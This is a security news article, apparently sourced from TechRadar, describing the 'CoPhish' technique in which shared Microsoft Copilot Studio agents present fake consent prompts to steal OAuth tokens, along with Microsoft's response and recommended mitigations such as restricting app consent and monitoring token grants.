Microsoft Copilot Studio Agents Exploited in New OAuth Token Phishing Scheme

Key Points

  • CoPhish is a new phishing technique that uses Microsoft Copilot Studio agents to steal OAuth tokens.
  • Attackers embed fake login or consent flows in shared agents, prompting users to grant access.
  • Compromised tokens give attackers access to email, chat, calendar, files, and automation functions.
  • The malicious UI appears on the legitimate Microsoft domain copilotstudio.microsoft.com, increasing credibility.
  • Microsoft acknowledges the issue and plans product updates to harden consent experiences.
  • Recommended mitigations include restricting third‑party app consent, enforcing MFA, and monitoring token activity.
  • Organizations should block or review shared Copilot Studio agents and revoke suspicious tokens promptly.

Experts warn Microsoft Copilot Studio agents are being hijacked to steal OAuth tokens

Overview

Datadog Security Labs has uncovered a novel phishing technique dubbed CoPhish that leverages Microsoft Copilot Studio agents—referred to as “Topics”—to harvest OAuth tokens from unsuspecting users. The method exploits the legitimate Microsoft domain copilotstudio.microsoft.com, making the malicious consent prompts appear authentic and increasing the likelihood that victims will comply.

How the Attack Works

Attackers create or share a Copilot Studio agent that includes a user‑interface element labeled “Login” or “Consent.” When a victim clicks the button, a Microsoft Entra/OAuth consent flow is launched. If the victim approves the request, the OAuth tokens are handed over to the attacker. These tokens grant the attacker access to a wide range of services within the victim’s tenant, including email, chat, calendar, files, and automation capabilities.

Potential Impact

Because the tokens provide direct access to core Microsoft 365 services, the compromise can lead to extensive data exposure. Attackers can read and send emails, view and modify calendar events, access files stored in OneDrive or SharePoint, and even execute automated actions on behalf of the compromised account. The use of a trusted Microsoft domain reduces user suspicion, making the technique especially dangerous.

Microsoft’s Response

Microsoft has confirmed awareness of the technique and described it as a social‑engineering vector. A spokesperson stated, “We’ve investigated this report and are taking action to address it through future product updates.” The company indicated it is working to harden governance and consent experiences and is evaluating additional safeguards to prevent misuse of Copilot Studio agents.

Mitigation Strategies

Security experts recommend several immediate steps to reduce risk:

  • Restrict third‑party app consent so that admin approval is required for all external applications.
  • Enforce conditional access policies and multi‑factor authentication for all users.
  • Block or closely review any shared or published Copilot Studio agents before they are allowed to run in the environment.
  • Monitor for unusual app registrations and OAuth token grants, and investigate any anomalies promptly.
  • Revoke suspicious tokens and remove any unauthorized applications from the tenant.

Implementing these controls can help organizations mitigate the threat while Microsoft works on longer‑term product enhancements.

Source: techradar.com